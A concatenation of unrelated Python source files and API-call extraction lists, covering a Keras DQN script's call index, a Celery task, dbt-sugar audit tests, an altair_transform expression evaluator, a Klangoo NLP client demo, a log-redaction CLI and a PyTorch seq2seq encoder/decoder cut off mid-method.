'(self.log_dir)\n', (2854, 2868), True, 'import tensorflow as tf\n'), ((4104, 4136), 'collections.deque', 'deque', ([], {'maxlen': 'REPLAY_MEMORY_SIZE'}), '(maxlen=REPLAY_MEMORY_SIZE)\n', (4109, 4136), False, 'from collections import deque\n'), ((4497, 4509), 'keras.models.Sequential', 'Sequential', ([], {}), '()\n', (4507, 4509), False, 'from keras.models import Sequential\n'), ((5911, 5960), 'random.sample', 'random.sample', (['self.replay_memory', 'MINIBATCH_SIZE'], {}), '(self.replay_memory, MINIBATCH_SIZE)\n', (5924, 5960), False, 'import random\n'), ((4532, 4576), 'keras.layers.Conv2D', 'Conv2D', (['(256)', '(3, 3)'], {'input_shape': '(10, 10, 3)'}), '(256, (3, 3), input_shape=(10, 10, 3))\n', (4538, 4576), False, 'from keras.layers import Dense, Dropout, Conv2D, MaxPooling2D, Activation, Flatten\n'), ((4661, 4679), 'keras.layers.Activation', 'Activation', (['"""relu"""'], {}), "('relu')\n", (4671, 4679), False, 'from keras.layers import Dense, Dropout, Conv2D, MaxPooling2D, Activation, Flatten\n'), ((4703, 4733), 'keras.layers.MaxPooling2D', 'MaxPooling2D', ([], {'pool_size': '(2, 2)'}), '(pool_size=(2, 2))\n', (4715, 4733), False, 'from keras.layers import Dense, Dropout, Conv2D, MaxPooling2D, Activation, Flatten\n'), ((4757, 4769), 'keras.layers.Dropout', 'Dropout', (['(0.2)'], {}), '(0.2)\n', (4764, 4769), False, 'from keras.layers import Dense, Dropout, Conv2D, MaxPooling2D, Activation, Flatten\n'), ((4798, 4817), 'keras.layers.Conv2D', 'Conv2D', (['(256)', '(3, 3)'], {}), '(256, (3, 3))\n', (4804, 4817), False, 'from keras.layers import Dense, Dropout, Conv2D, MaxPooling2D, Activation, Flatten\n'), ((4841, 4859), 'keras.layers.Activation', 'Activation', (['"""relu"""'], {}), "('relu')\n", (4851, 4859), False, 'from keras.layers import Dense, Dropout, Conv2D, MaxPooling2D, Activation, Flatten\n'), ((4883, 4913), 'keras.layers.MaxPooling2D', 'MaxPooling2D', ([], {'pool_size': '(2, 2)'}), '(pool_size=(2, 2))\n', (4895, 4913), False, 'from keras.layers import Dense, Dropout, Conv2D, MaxPooling2D, Activation, Flatten\n'), ((4937, 4949), 'keras.layers.Dropout', 'Dropout', (['(0.2)'], {}), '(0.2)\n', (4944, 4949), False, 'from keras.layers import Dense, Dropout, Conv2D, MaxPooling2D, Activation, Flatten\n'), ((4978, 4987), 'keras.layers.Flatten', 'Flatten', ([], {}), '()\n', (4985, 4987), False, 'from keras.layers import Dense, Dropout, Conv2D, MaxPooling2D, Activation, Flatten\n'), ((5070, 5079), 'keras.layers.Dense', 'Dense', (['(64)'], {}), '(64)\n', (5075, 5079), False, 'from keras.layers import Dense, Dropout, Conv2D, MaxPooling2D, Activation, Flatten\n'), ((5108, 5137), 'keras.layers.Dense', 'Dense', (['(5)'], {'activation': '"""linear"""'}), "(5, activation='linear')\n", (5113, 5137), False, 'from keras.layers import Dense, Dropout, Conv2D, MaxPooling2D, Activation, Flatten\n'), ((6077, 6130), 'numpy.array', 'np.array', (['[transition[0] for transition in minibatch]'], {}), '([transition[0] for transition in minibatch])\n', (6085, 6130), True, 'import numpy as np\n'), ((6411, 6464), 'numpy.array', 'np.array', (['[transition[3] for transition in minibatch]'], {}), '([transition[3] for transition in minibatch])\n', (6419, 6464), True, 'import numpy as np\n'), ((7549, 7560), 'numpy.array', 'np.array', (['y'], {}), '(y)\n', (7557, 7560), True, 'import numpy as np\n'), ((10578, 10589), 'numpy.zeros', 'np.zeros', (['(5)'], {}), '(5)\n', (10586, 10589), True, 'import numpy as np\n'), ((5231, 5245), 'keras.optimizers.Adam', 'Adam', ([], {'lr': '(0.001)'}), '(lr=0.001)\n', (5235, 5245), False, 'from keras.optimizers import Adam\n'), ((6997, 7026), 'numpy.max', 'np.max', (['future_qs_list[index]'], {}), '(future_qs_list[index])\n', (7003, 7026), True, 'import numpy as np\n'), ((7532, 7543), 'numpy.array', 'np.array', (['X'], {}), '(X)\n', (7540, 7543), True, 'import numpy as np\n'), ((10609, 10627), 'numpy.random.random', 'np.random.random', ([], {}), '()\n', (10625, 10627), True, 'import numpy as np\n'), ((10848, 10871), 'numpy.random.randint', 'np.random.randint', (['(0)', '(5)'], {}), '(0, 5)\n', (10865, 10871), True, 'import numpy as np\n'), ((4291, 4302), 'time.time', 'time.time', ([], {}), '()\n', (4300, 4302), False, 'import time\n'), ((8271, 8286), 'numpy.array', 'np.array', (['state'], {}), '(state)\n', (8279, 8286), True, 'import numpy as np\n'), ((12482, 12493), 'time.time', 'time.time', ([], {}), '()\n', (12491, 12493), False, 'import time\n')] |
#! python3
# -*- encoding: utf-8 -*-
from job import celery
@celery.task()
def add(x, y):
return x+y
| [
"job.celery.task"
] | [((65, 78), 'job.celery.task', 'celery.task', ([], {}), '()\n', (76, 78), False, 'from job import celery\n')] |
from pathlib import Path
from unittest.mock import call
import pytest
from dbt_sugar.core.clients.dbt import DbtProfile
from dbt_sugar.core.config.config import DbtSugarConfig
from dbt_sugar.core.flags import FlagParser
from dbt_sugar.core.main import parser
from dbt_sugar.core.task.audit import AuditTask
from dbt_sugar.core.task.base import COLUMN_NOT_DOCUMENTED
FIXTURE_DIR = Path(__file__).resolve().parent
def __init_descriptions(datafiles):
flag_parser = FlagParser(parser)
config_filepath = Path(FIXTURE_DIR).joinpath("sugar_config.yml")
flag_parser.consume_cli_arguments(
test_cli_args=[
"audit",
"--config-path",
str(config_filepath),
]
)
sugar_config = DbtSugarConfig(flag_parser)
sugar_config.load_config()
profile = DbtProfile(
flags=flag_parser,
profile_name="dbt_sugar_test",
target_name=str(),
profiles_dir=Path(datafiles),
)
profile.read_profile()
audit_task = AuditTask(flag_parser, FIXTURE_DIR, sugar_config=sugar_config, dbt_profile=profile)
audit_task.dbt_definitions = {"columnA": "descriptionA", "columnB": "descriptionB"}
audit_task.repository_path = Path("tests/test_dbt_project/")
return audit_task
@pytest.mark.parametrize(
"dbt_definitions, result",
[
pytest.param(
{"columnA": "descriptionA", "columnB": "descriptionB"},
"100.0",
id="all_columns_documented",
),
pytest.param(
{"columnA": COLUMN_NOT_DOCUMENTED, "columnB": COLUMN_NOT_DOCUMENTED},
"0.0",
id="none_columns_documented",
),
pytest.param(
{"columnA": "descriptionA", "columnB": COLUMN_NOT_DOCUMENTED},
"50.0",
id="half_columns_documented",
),
],
)
@pytest.mark.datafiles(FIXTURE_DIR)
def test_get_project_total_test_coverage(datafiles, dbt_definitions, result):
audit_task = __init_descriptions(datafiles)
audit_task.dbt_definitions = dbt_definitions
assert audit_task.get_project_total_test_coverage() == result
@pytest.mark.parametrize(
"failures, total, result",
[
pytest.param(
0,
0,
"0.0",
id="calculate_failures_with_0_failures_and_total",
),
pytest.param(
8,
10,
"20.0",
id="calculate_failures",
),
pytest.param(
0,
10,
"100.0",
id="calculate_failures_with_0_failures",
),
],
)
@pytest.mark.datafiles(FIXTURE_DIR)
def test_calculate_coverage_percentage(datafiles, failures, total, result):
audit_task = __init_descriptions(datafiles)
assert audit_task.calculate_coverage_percentage(misses=failures, total=total) == result
@pytest.mark.parametrize(
"data, total, result",
[
pytest.param(
[],
"0.0",
{},
id="check_results_with_data_being_empty",
),
pytest.param(
["column_A"],
"10.0",
{"column_A": "", "": "", "Total": "10.0"},
id="check_results_with_one_data_element",
),
pytest.param(
["column_A", "column_B"],
"10.0",
{"column_A": "", "column_B": "", "": "", "Total": "10.0"},
id="check_results_with_more_than_one_data_element",
),
],
)
@pytest.mark.datafiles(FIXTURE_DIR)
def test_print_nicely_the_data(datafiles, data, total, result):
audit_task = __init_descriptions(datafiles)
assert audit_task.print_nicely_the_data(data=data, total=total) == result
@pytest.mark.parametrize(
"dbt_tests, model_name, call_input",
[
pytest.param(
{
"dim_company": [
{"name": "id", "tests": []},
{"name": "name", "tests": []},
{"name": "age", "tests": []},
{"name": "address", "tests": ["not_null"]},
{"name": "salary", "tests": ["unique"]},
],
"stg_customers": [{"name": "customer_id", "tests": ["unique", "not_null"]}],
},
"dim_company",
[
call(
columns=["Untested Columns", "% coverage"],
data={"age": "", "id": "", "name": "", "": "", "Total": "40.0"},
title="Test Coverage",
)
],
id="check_test_coverage_calculation",
),
],
)
@pytest.mark.datafiles(FIXTURE_DIR)
def test_get_model_test_coverage(datafiles, mocker, dbt_tests, model_name, call_input):
create_table = mocker.patch("dbt_sugar.core.task.audit.AuditTask.create_table")
audit_task = __init_descriptions(datafiles)
audit_task.model_name = model_name
audit_task.dbt_tests = dbt_tests
audit_task.get_model_test_coverage()
create_table.assert_has_calls(call_input)
@pytest.mark.parametrize(
"dbt_tests, call_input",
[
pytest.param(
{
"dim_company": [
{"name": "id", "tests": []},
{"name": "name", "tests": []},
{"name": "age", "tests": []},
{"name": "address", "tests": ["not_null"]},
{"name": "salary", "tests": ["unique"]},
],
"stg_customers": [{"name": "customer_id", "tests": ["unique", "not_null"]}],
},
[
call(
columns=["Model Name", "% coverage"],
data={"dim_company": "40.0", "stg_customers": "100.0", "": "", "Total": "50.0"},
title="Test Coverage",
)
],
id="check_test_coverage_calculation",
),
],
)
@pytest.mark.datafiles(FIXTURE_DIR)
def test_get_project_test_coverage(datafiles, mocker, dbt_tests, call_input):
create_table = mocker.patch("dbt_sugar.core.task.audit.AuditTask.create_table")
audit_task = __init_descriptions(datafiles)
audit_task.dbt_tests = dbt_tests
audit_task.get_project_test_coverage()
create_table.assert_has_calls(call_input)
@pytest.mark.parametrize(
"model_content, model_name, call_input",
[
pytest.param(
{
"version": 2,
"models": [
{
"name": "dim_company",
"description": "aa.",
"columns": [
{"name": "id", "description": "No description for this column."},
{"name": "name", "description": "No description for this column."},
{"name": "age", "description": "No description for this column."},
{
"name": "address",
"description": "No description for this column.",
"tests": ["not_null"],
},
{"name": "salary", "description": "hey.", "tests": ["unique"]},
],
}
],
},
"dim_company",
[
call(
columns=["Undocumented Columns", "% coverage"],
data={"id": "", "name": "", "age": "", "address": "", "": "", "Total": "20.0"},
title="Documentation Coverage",
)
],
id="check_column_description_coverage_calculation",
),
],
)
@pytest.mark.datafiles(FIXTURE_DIR)
def test_get_model_column_description_coverage(
datafiles, mocker, model_content, model_name, call_input
):
audit_task = __init_descriptions(datafiles)
audit_task.get_model_column_description_coverage()
create_table = mocker.patch("dbt_sugar.core.task.audit.AuditTask.create_table")
audit_task = __init_descriptions(datafiles)
audit_task.model_content = model_content
audit_task.model_name = model_name
audit_task.get_model_column_description_coverage()
create_table.assert_has_calls(call_input)
| [
"dbt_sugar.core.task.audit.AuditTask",
"pathlib.Path",
"unittest.mock.call",
"pytest.mark.datafiles",
"pytest.param",
"dbt_sugar.core.flags.FlagParser",
"dbt_sugar.core.config.config.DbtSugarConfig"
] | [((1852, 1886), 'pytest.mark.datafiles', 'pytest.mark.datafiles', (['FIXTURE_DIR'], {}), '(FIXTURE_DIR)\n', (1873, 1886), False, 'import pytest\n'), ((2607, 2641), 'pytest.mark.datafiles', 'pytest.mark.datafiles', (['FIXTURE_DIR'], {}), '(FIXTURE_DIR)\n', (2628, 2641), False, 'import pytest\n'), ((3481, 3515), 'pytest.mark.datafiles', 'pytest.mark.datafiles', (['FIXTURE_DIR'], {}), '(FIXTURE_DIR)\n', (3502, 3515), False, 'import pytest\n'), ((4611, 4645), 'pytest.mark.datafiles', 'pytest.mark.datafiles', (['FIXTURE_DIR'], {}), '(FIXTURE_DIR)\n', (4632, 4645), False, 'import pytest\n'), ((5906, 5940), 'pytest.mark.datafiles', 'pytest.mark.datafiles', (['FIXTURE_DIR'], {}), '(FIXTURE_DIR)\n', (5927, 5940), False, 'import pytest\n'), ((7713, 7747), 'pytest.mark.datafiles', 'pytest.mark.datafiles', (['FIXTURE_DIR'], {}), '(FIXTURE_DIR)\n', (7734, 7747), False, 'import pytest\n'), ((471, 489), 'dbt_sugar.core.flags.FlagParser', 'FlagParser', (['parser'], {}), '(parser)\n', (481, 489), False, 'from dbt_sugar.core.flags import FlagParser\n'), ((741, 768), 'dbt_sugar.core.config.config.DbtSugarConfig', 'DbtSugarConfig', (['flag_parser'], {}), '(flag_parser)\n', (755, 768), False, 'from dbt_sugar.core.config.config import DbtSugarConfig\n'), ((1009, 1097), 'dbt_sugar.core.task.audit.AuditTask', 'AuditTask', (['flag_parser', 'FIXTURE_DIR'], {'sugar_config': 'sugar_config', 'dbt_profile': 'profile'}), '(flag_parser, FIXTURE_DIR, sugar_config=sugar_config, dbt_profile=\n profile)\n', (1018, 1097), False, 'from dbt_sugar.core.task.audit import AuditTask\n'), ((1214, 1245), 'pathlib.Path', 'Path', (['"""tests/test_dbt_project/"""'], {}), "('tests/test_dbt_project/')\n", (1218, 1245), False, 'from pathlib import Path\n'), ((1341, 1451), 'pytest.param', 'pytest.param', (["{'columnA': 'descriptionA', 'columnB': 'descriptionB'}", '"""100.0"""'], {'id': '"""all_columns_documented"""'}), "({'columnA': 'descriptionA', 'columnB': 'descriptionB'},\n '100.0', id='all_columns_documented')\n", (1353, 1451), False, 'import pytest\n'), ((1504, 1627), 'pytest.param', 'pytest.param', (["{'columnA': COLUMN_NOT_DOCUMENTED, 'columnB': COLUMN_NOT_DOCUMENTED}", '"""0.0"""'], {'id': '"""none_columns_documented"""'}), "({'columnA': COLUMN_NOT_DOCUMENTED, 'columnB':\n COLUMN_NOT_DOCUMENTED}, '0.0', id='none_columns_documented')\n", (1516, 1627), False, 'import pytest\n'), ((1680, 1797), 'pytest.param', 'pytest.param', (["{'columnA': 'descriptionA', 'columnB': COLUMN_NOT_DOCUMENTED}", '"""50.0"""'], {'id': '"""half_columns_documented"""'}), "({'columnA': 'descriptionA', 'columnB': COLUMN_NOT_DOCUMENTED},\n '50.0', id='half_columns_documented')\n", (1692, 1797), False, 'import pytest\n'), ((2201, 2277), 'pytest.param', 'pytest.param', (['(0)', '(0)', '"""0.0"""'], {'id': '"""calculate_failures_with_0_failures_and_total"""'}), "(0, 0, '0.0', id='calculate_failures_with_0_failures_and_total')\n", (2213, 2277), False, 'import pytest\n'), ((2346, 2398), 'pytest.param', 'pytest.param', (['(8)', '(10)', '"""20.0"""'], {'id': '"""calculate_failures"""'}), "(8, 10, '20.0', id='calculate_failures')\n", (2358, 2398), False, 'import pytest\n'), ((2467, 2536), 'pytest.param', 'pytest.param', (['(0)', '(10)', '"""100.0"""'], {'id': '"""calculate_failures_with_0_failures"""'}), "(0, 10, '100.0', id='calculate_failures_with_0_failures')\n", (2479, 2536), False, 'import pytest\n'), ((2927, 2996), 'pytest.param', 'pytest.param', (['[]', '"""0.0"""', '{}'], {'id': '"""check_results_with_data_being_empty"""'}), "([], '0.0', {}, id='check_results_with_data_being_empty')\n", (2939, 2996), False, 'import pytest\n'), ((3065, 3189), 'pytest.param', 'pytest.param', (["['column_A']", '"""10.0"""', "{'column_A': '', '': '', 'Total': '10.0'}"], {'id': '"""check_results_with_one_data_element"""'}), "(['column_A'], '10.0', {'column_A': '', '': '', 'Total': '10.0'\n }, id='check_results_with_one_data_element')\n", (3077, 3189), False, 'import pytest\n'), ((3253, 3419), 'pytest.param', 'pytest.param', (["['column_A', 'column_B']", '"""10.0"""', "{'column_A': '', 'column_B': '', '': '', 'Total': '10.0'}"], {'id': '"""check_results_with_more_than_one_data_element"""'}), "(['column_A', 'column_B'], '10.0', {'column_A': '', 'column_B':\n '', '': '', 'Total': '10.0'}, id=\n 'check_results_with_more_than_one_data_element')\n", (3265, 3419), False, 'import pytest\n'), ((383, 397), 'pathlib.Path', 'Path', (['__file__'], {}), '(__file__)\n', (387, 397), False, 'from pathlib import Path\n'), ((512, 529), 'pathlib.Path', 'Path', (['FIXTURE_DIR'], {}), '(FIXTURE_DIR)\n', (516, 529), False, 'from pathlib import Path\n'), ((941, 956), 'pathlib.Path', 'Path', (['datafiles'], {}), '(datafiles)\n', (945, 956), False, 'from pathlib import Path\n'), ((4309, 4449), 'unittest.mock.call', 'call', ([], {'columns': "['Untested Columns', '% coverage']", 'data': "{'age': '', 'id': '', 'name': '', '': '', 'Total': '40.0'}", 'title': '"""Test Coverage"""'}), "(columns=['Untested Columns', '% coverage'], data={'age': '', 'id': '',\n 'name': '', '': '', 'Total': '40.0'}, title='Test Coverage')\n", (4313, 4449), False, 'from unittest.mock import call\n'), ((5594, 5744), 'unittest.mock.call', 'call', ([], {'columns': "['Model Name', '% coverage']", 'data': "{'dim_company': '40.0', 'stg_customers': '100.0', '': '', 'Total': '50.0'}", 'title': '"""Test Coverage"""'}), "(columns=['Model Name', '% coverage'], data={'dim_company': '40.0',\n 'stg_customers': '100.0', '': '', 'Total': '50.0'}, title='Test Coverage')\n", (5598, 5744), False, 'from unittest.mock import call\n'), ((7369, 7542), 'unittest.mock.call', 'call', ([], {'columns': "['Undocumented Columns', '% coverage']", 'data': "{'id': '', 'name': '', 'age': '', 'address': '', '': '', 'Total': '20.0'}", 'title': '"""Documentation Coverage"""'}), "(columns=['Undocumented Columns', '% coverage'], data={'id': '', 'name':\n '', 'age': '', 'address': '', '': '', 'Total': '20.0'}, title=\n 'Documentation Coverage')\n", (7373, 7542), False, 'from unittest.mock import call\n')] |
"""Functionality to evaluate contents of the ast"""
from functools import singledispatch, wraps
import operator
from typing import Any, Union
from altair_transform.utils import ast, Parser
__all__ = ['evaljs']
def evaljs(expression: Union[str, ast.Expr], namespace: dict = None) -> Any:
"""Evaluate a javascript expression, optionally with a namespace."""
if isinstance(expression, str):
parser = Parser()
expression = parser.parse(expression)
return visit(expression, namespace or {})
@singledispatch
def visit(obj: Any, namespace: dict) -> Any:
return obj
@visit.register
def _visit_expr(obj: ast.Expr, namespace: dict) -> Any:
return obj.value
@visit.register
def _visit_binop(obj: ast.BinOp, namespace: dict) -> Any:
if obj.op not in BINARY_OPERATORS:
raise NotImplementedError(f"Binary Operator A {obj.op} B")
op = BINARY_OPERATORS[obj.op]
return op(visit(obj.lhs, namespace), visit(obj.rhs, namespace))
@visit.register
def _visit_unop(obj: ast.UnOp, namespace: dict) -> Any:
if obj.op not in UNARY_OPERATORS:
raise NotImplementedError(f"Unary Operator {obj.op}x")
op = UNARY_OPERATORS[obj.op]
return op(visit(obj.rhs, namespace))
@visit.register
def _visit_ternop(obj: ast.TernOp, namespace: dict) -> Any:
if obj.op not in TERNARY_OPERATORS:
raise NotImplementedError(
f"Ternary Operator A {obj.op[0]} B {obj.op[1]} C")
op = TERNARY_OPERATORS[obj.op]
return op(visit(obj.lhs, namespace),
visit(obj.mid, namespace),
visit(obj.rhs, namespace))
@visit.register
def _visit_number(obj: ast.Number, namespace: dict) -> Any:
return obj.value
@visit.register
def _visit_string(obj: ast.String, namespace: dict) -> Any:
return obj.value
@visit.register
def _visit_global(obj: ast.Global, namespace: dict) -> Any:
if obj.name not in namespace:
raise NameError("{0} is not a valid name".format(obj.name))
return namespace[obj.name]
@visit.register
def _visit_name(obj: ast.Name, namespace: dict) -> Any:
return obj.name
@visit.register
def _visit_list(obj: ast.List, namespace: dict) -> Any:
return [visit(entry, namespace) for entry in obj.entries]
@visit.register
def _visit_object(obj: ast.Object, namespace: dict) -> Any:
def _visit(entry):
if isinstance(entry, tuple):
return tuple(visit(e, namespace) for e in entry)
if isinstance(entry, ast.Name):
return (visit(entry, namespace),
visit(ast.Global(entry.name), namespace))
return dict(_visit(entry) for entry in obj.entries)
@visit.register
def _visit_attr(obj: ast.Attr, namespace: dict) -> Any:
obj_ = visit(obj.obj, namespace)
attr = visit(obj.attr, namespace)
if isinstance(obj_, dict):
return obj_[attr]
return getattr(obj_, attr)
@visit.register
def _visit_item(obj: ast.Item, namespace: dict) -> Any:
obj_ = visit(obj.obj, namespace)
item = visit(obj.item, namespace)
if isinstance(obj_, list) and isinstance(item, float):
item = int(item)
return obj_[item]
@visit.register
def _visit_func(obj: ast.Func, namespace: dict) -> Any:
func = visit(obj.func, namespace)
args = [visit(arg, namespace) for arg in obj.args]
return func(*args)
def int_inputs(func):
@wraps(func)
def wrapper(*args):
return float(func(*map(int, args)))
return wrapper
@int_inputs
def zerofill_rshift(lhs: int, rhs: int) -> int:
if lhs < 0:
lhs = lhs + 0x100000000
return lhs >> rhs
# TODO: do implicit type conversions ugh...
UNARY_OPERATORS = {
'~': int_inputs(operator.inv),
'-': operator.neg,
'+': operator.pos,
'!': operator.not_,
}
BINARY_OPERATORS = {
"+": operator.add,
"-": operator.sub,
"*": operator.mul,
"/": operator.truediv,
"**": operator.pow,
"%": operator.mod,
"&": int_inputs(operator.and_),
"|": int_inputs(operator.or_),
"^": int_inputs(operator.xor),
"<<": int_inputs(operator.lshift),
">>": int_inputs(operator.rshift),
">>>": zerofill_rshift,
"<": operator.lt,
"<=": operator.le,
">": operator.gt,
">=": operator.ge,
"==": operator.eq,
"===": operator.eq,
"!=": operator.ne,
"!==": operator.ne,
"&&": lambda a, b: a and b,
"||": lambda a, b: a or b,
}
TERNARY_OPERATORS = {
("?", ":"): lambda a, b, c: b if a else c
}
| [
"altair_transform.utils.ast.Global",
"altair_transform.utils.Parser",
"functools.wraps"
] | [((3350, 3361), 'functools.wraps', 'wraps', (['func'], {}), '(func)\n', (3355, 3361), False, 'from functools import singledispatch, wraps\n'), ((417, 425), 'altair_transform.utils.Parser', 'Parser', ([], {}), '()\n', (423, 425), False, 'from altair_transform.utils import ast, Parser\n'), ((2547, 2569), 'altair_transform.utils.ast.Global', 'ast.Global', (['entry.name'], {}), '(entry.name)\n', (2557, 2569), False, 'from altair_transform.utils import ast, Parser\n')] |
#!/usr/bin/env python
# -- coding: UTF-8 --
"""
Magnet API NLP Sample
Copyright 2018, Klangoo Inc.
"""
from klangooclient.MagnetAPIClient import MagnetAPIClient
ENDPOINT = 'https://nlp.klangoo.com/Service.svc'
CALK = 'enter your calk here'
SECRET_KEY = 'enter your secret key here'
client = MagnetAPIClient(ENDPOINT, CALK, SECRET_KEY)
def test_process_document():
request = { 'text' : 'The United States of America (USA), commonly known as the United States (U.S.) or America, is a federal republic composed of 50 states, a federal district, five major self-governing territories, and various possessions.',
'lang' : 'en', 'format' : 'json' }
json = client.callwebmethod('ProcessDocument', request, 'POST')
print('\nProcess Document:')
print(json)
def test_get_summary():
request = { 'text' : 'The United States of America (USA), commonly known as the United States (U.S.) or America, is a federal republic composed of 50 states, a federal district, five major self-governing territories, and various possessions.',
'lang' : 'en', 'format' : 'json' }
json = client.callwebmethod('GetSummary', request, 'POST')
print('\nGet Summary:')
print(json)
def test_get_entities():
request = { 'text' : 'The United States of America (USA), commonly known as the United States (U.S.) or America, is a federal republic composed of 50 states, a federal district, five major self-governing territories, and various possessions.',
'lang' : 'en', 'format' : 'json' }
json = client.callwebmethod('GetEntities', request, 'POST')
print('\nGet Entities:')
print(json)
def test_get_categories():
request = { 'text' : 'The United States of America (USA), commonly known as the United States (U.S.) or America, is a federal republic composed of 50 states, a federal district, five major self-governing territories, and various possessions.',
'lang' : 'en', 'format' : 'json' }
json = client.callwebmethod('GetCategories', request, 'POST')
print('\nGet Categories:')
print(json)
def test_get_key_topics():
request = { 'text' : 'The United States of America (USA), commonly known as the United States (U.S.) or America, is a federal republic composed of 50 states, a federal district, five major self-governing territories, and various possessions.',
'lang' : 'en', 'format' : 'json' }
json = client.callwebmethod('GetKeyTopics', request, 'POST')
print('\nGet Key Topics:')
print(json)
if __name__ == "__main__":
test_process_document()
test_get_summary()
test_get_entities()
test_get_categories()
test_get_key_topics() | [
"klangooclient.MagnetAPIClient.MagnetAPIClient"
] | [((301, 344), 'klangooclient.MagnetAPIClient.MagnetAPIClient', 'MagnetAPIClient', (['ENDPOINT', 'CALK', 'SECRET_KEY'], {}), '(ENDPOINT, CALK, SECRET_KEY)\n', (316, 344), False, 'from klangooclient.MagnetAPIClient import MagnetAPIClient\n')] |
"""log_redaction_cli
Usage:
log_redaction_cli.py --tarfile <tarfile> --working-dir <working-dir> --output-dir <output-dir>
log_redaction_cli.py (-h | --help)
log_redaction_cli.py --version
Options:
-h --help Pass in a string: example command: python log_redaction_cli.py --tarfile "test/files/test_output.tar.gz" --working-dir "/home/kalab/github/stringer/test/files" --output-dir log_redataction_example
--version v version
"""
from docopt import docopt
import stringer.utils.log_redaction_utils as log_redact
if __name__ == '__main__':
arguments = docopt(__doc__, version='0.0.9')
perm_list = log_redact.process_gz(file=arguments.get("<tarfile>"),working_dir=arguments.get("<working-dir>"), output_gz_dir=arguments.get("<output-dir>"))
print(str(perm_list))
| [
"docopt.docopt"
] | [((580, 612), 'docopt.docopt', 'docopt', (['__doc__'], {'version': '"""0.0.9"""'}), "(__doc__, version='0.0.9')\n", (586, 612), False, 'from docopt import docopt\n')] |
import torch
import torch.nn as nn
from torch.nn.utils.rnn import pack_padded_sequence, pad_packed_sequence
import numpy as np
import torch.nn.functional as F
from attention import AdditiveAttention
class Encoder(nn.Module):
"""Encoder bi-GRU"""
def __init__(self, input_dim, char_embed_dim,
encoder_hidd_dim,
decoder_hidd_dim,
num_layers,
morph_embeddings=None,
fasttext_embeddings=None,
char_padding_idx=0,
word_padding_idx=0,
dropout=0):
super(Encoder, self).__init__()
morph_embeddings_dim = 0
self.morph_embedding_layer = None
fasttext_embeddings_dim = 0
self.fasttext_embedding_layer = None
self.char_embedding_layer = nn.Embedding(input_dim,
char_embed_dim,
padding_idx=char_padding_idx)
if morph_embeddings is not None:
self.morph_embedding_layer = nn.Embedding.from_pretrained(morph_embeddings,
padding_idx=word_padding_idx)
morph_embeddings_dim = morph_embeddings.shape[1]
if fasttext_embeddings is not None:
self.fasttext_embedding_layer = nn.Embedding.from_pretrained(fasttext_embeddings)
fasttext_embeddings_dim = fasttext_embeddings.shape[1]
self.rnn = nn.GRU(input_size=char_embed_dim + morph_embeddings_dim + fasttext_embeddings_dim,
hidden_size=encoder_hidd_dim,
num_layers=num_layers,
batch_first=True,
bidirectional=True,
dropout=dropout if num_layers > 1 else 0.0)
self.linear_map = nn.Linear(encoder_hidd_dim * 2, decoder_hidd_dim)
def forward(self, char_src_seqs, word_src_seqs, src_seqs_lengths):
embedded_seqs = self.char_embedding_layer(char_src_seqs)
# embedded_seqs shape: [batch_size, max_src_seq_len, char_embed_dim]
# Add morph embeddings to the char embeddings if needed
if self.morph_embedding_layer is not None:
embedded_word_seqs_morph = self.morph_embedding_layer(word_src_seqs)
# embedded_word_seqs_morph shape: [batch_size, max_src_seq_len, morph_embeddings_dim]
embedded_seqs = torch.cat((embedded_seqs, embedded_word_seqs_morph), dim=2)
# embedded_seqs shape: [batch_size, max_src_seq_len, char_embed_dim + morph_embeddings_dim]
# Add fasttext embeddings to the char embeddings if needed
if self.fasttext_embedding_layer is not None:
embedded_word_seqs_ft = self.fasttext_embedding_layer(word_src_seqs)
# embedded_word_seqs_ft shape: [batch_size, max_src_seq_len, fasttext_embeddings_dim]
embedded_seqs = torch.cat((embedded_seqs, embedded_word_seqs_ft), dim=2)
# embedded_seqs shape: [batch_size, max_src_seq_len, char_embed_dim + fasttext_embeddings_dim]
# packing the embedded_seqs
packed_embedded_seqs = pack_padded_sequence(embedded_seqs, src_seqs_lengths, batch_first=True)
output, hidd = self.rnn(packed_embedded_seqs)
# hidd shape: [num_layers * num_dirs, batch_size, encoder_hidd_dim]
# concatenating the forward and backward vectors for each layer
hidd = torch.cat([hidd[0:hidd.size(0):2], hidd[1:hidd.size(0):2]], dim=2)
# hidd shape: [num layers, batch_size, num_directions * encoder_hidd_dim]
# mapping the encode hidd state to the decoder hidd dim space
hidd = torch.tanh(self.linear_map(hidd))
# unpacking the output
output, lengths = pad_packed_sequence(output, batch_first=True)
# output shape: [batch_size, src_seqs_length, num_dirs * encoder_hidd_dim]
return output, hidd
class Decoder(nn.Module):
"""Decoder GRU
Things to note:
- The input to the decoder rnn at each time step is the
concatenation of the embedded token and the context vector
- The context vector will have a size of batch_size, encoder_hidd_dim * 2
- The prediction layer input is the concatenation of
the context vector and the h_t of the decoder
"""
def __init__(self, input_dim, char_embed_dim,
decoder_hidd_dim, num_layers,
output_dim,
encoder_hidd_dim,
padding_idx=0,
embed_trg_gender=False,
gender_embeddings=None,
gender_input_dim=0,
gender_embed_dim=0,
dropout=0):
super(Decoder, self).__init__()
self.attention = AdditiveAttention(encoder_hidd_dim=encoder_hidd_dim,
decoder_hidd_dim=decoder_hidd_dim)
self.gender_embedding_layer = None
if embed_trg_gender:
if gender_embeddings is None:
self.gender_embedding_layer = nn.Embedding(gender_input_dim, gender_embed_dim)
else:
self.gender_embedding_layer = nn.Embedding.from_pretrained(gender_embeddings)
self.char_embedding_layer = nn.Embedding(input_dim,
char_embed_dim,
padding_idx=padding_idx)
# the input to the rnn is the context_vector + embedded token --> embed_dim + hidd_dim
self.rnn = nn.GRU(input_size=char_embed_dim + encoder_hidd_dim * 2,
hidden_size=decoder_hidd_dim,
num_layers=num_layers,
batch_first=True,
dropout=dropout if num_layers > 1 else 0.0)
# the input to the classifier is h_t + context_vector + gender_embed_dim? --> hidd_dim * 2
self.classification_layer = nn.Linear(encoder_hidd_dim * 2
+ decoder_hidd_dim * num_layers
+ gender_embed_dim + char_embed_dim, output_dim)
self.dropout_layer = nn.Dropout(dropout)
def forward(self, trg_seqs, encoder_outputs, decoder_h_t, context_vectors,
attention_mask, trg_gender=None):
# trg_seqs shape: [batch_size]
batch_size = trg_seqs.shape[0]
trg_seqs = trg_seqs.unsqueeze(1)
# trg_seqs shape: [batch_size, 1]
# Step 1: embedding the target seqs
embedded_seqs = self.char_embedding_layer(trg_seqs)
# embedded_seqs shape: [batch_size, 1, embed_dim]
# context_vectors shape: [batch_size, encoder_hidd_dim * 2]
# changing shape to: [batch_size, 1, encoder_hidd_dim * 2]
context_vectors = context_vectors.unsqueeze(1)
# concatenating the embedded trg sequence with the context_vectors
